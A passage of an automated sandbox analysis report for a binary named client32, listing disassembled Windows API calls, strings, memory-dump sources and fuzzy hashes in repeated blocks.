                                                                                                                • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 490496107-2775872530
                                                                                                                • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                                                • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                                                                • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                                                • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
                                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                • LoadLibraryA.KERNEL32(secur32.dll,0BAD89F8,?,?,?), ref: 111470D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                                                                • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                                                                • timeGetTime.WINMM(?,?), ref: 11147113
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                                                                • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                                                                • API String ID: 2282859717-3523682560
                                                                                                                • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                                                                • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                                                                APIs
                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                • _memmove.LIBCMT ref: 11035267
                                                                                                                • _memmove.LIBCMT ref: 1103528B
                                                                                                                • _memmove.LIBCMT ref: 110352C5
                                                                                                                • _memmove.LIBCMT ref: 110352E1
                                                                                                                • std::exception::exception.LIBCMT ref: 1103532B
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                • String ID: deque<T> too long
                                                                                                                • API String ID: 827257264-309773918
                                                                                                                • Opcode ID: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
                                                                                                                • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                                                • Opcode Fuzzy Hash: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
                                                                                                                • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                                                                APIs
                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                • _memmove.LIBCMT ref: 110193F7
                                                                                                                • _memmove.LIBCMT ref: 1101941B
                                                                                                                • _memmove.LIBCMT ref: 11019455
                                                                                                                • _memmove.LIBCMT ref: 11019471
                                                                                                                • std::exception::exception.LIBCMT ref: 110194BB
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                • String ID: deque<T> too long
                                                                                                                • API String ID: 827257264-309773918
                                                                                                                • Opcode ID: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
                                                                                                                • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                                                • Opcode Fuzzy Hash: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
                                                                                                                • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                                  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                                  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                                  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                                                • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                                                • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                                                • String ID: 8
                                                                                                                • API String ID: 762489935-4194326291
                                                                                                                • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                                • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                                                • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                                • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                                                • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                                                • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                                                • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                                                • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$Sleep
                                                                                                                • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                                                • API String ID: 4250438611-314227603
                                                                                                                • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                                • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                                                • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                                • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                                                APIs
                                                                                                                • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                                                  • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                                                • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                                                • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                                                • SetFocus.USER32(00000000), ref: 11023417
                                                                                                                • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                • API String ID: 1605826578-1986719024
                                                                                                                • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                                • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                                                • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                                • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                                                APIs
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                                                                • _memset.LIBCMT ref: 1114515E
                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                                                                • CreatePopupMenu.USER32 ref: 111451AA
                                                                                                                • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                                                                • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                                                • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 74472576-4108050209
                                                                                                                • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                                • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                                                APIs
                                                                                                                • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                                                • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                • API String ID: 4241058051-934300333
                                                                                                                • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                                                • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,771B23A0,1100BF7B), ref: 11110928
                                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                                • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                                                • IsWindow.USER32(?), ref: 1103D17E
                                                                                                                • SendMessageA.USER32(?,0000004A,0002045A,00000492), ref: 1103D1B8
                                                                                                                • _free.LIBCMT ref: 1103D1BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
